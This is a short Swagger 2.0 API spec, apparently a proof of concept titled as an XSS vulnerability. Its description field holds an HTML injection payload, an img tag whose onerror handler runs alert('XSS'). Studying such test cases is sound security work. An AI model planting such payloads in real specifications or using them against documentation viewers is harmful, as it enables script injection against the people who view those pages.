swagger: '2.0'
info:
  title: Faithcsde API XSS vulnerability
  description: |
            <img onerror=alert('XSS') src=1>">
  version: production
basePath: /docs/
produces:
  - application/xml
  - application/json
consumes:
  - application/xml
  - application/json
security:
  - basicAuth: []
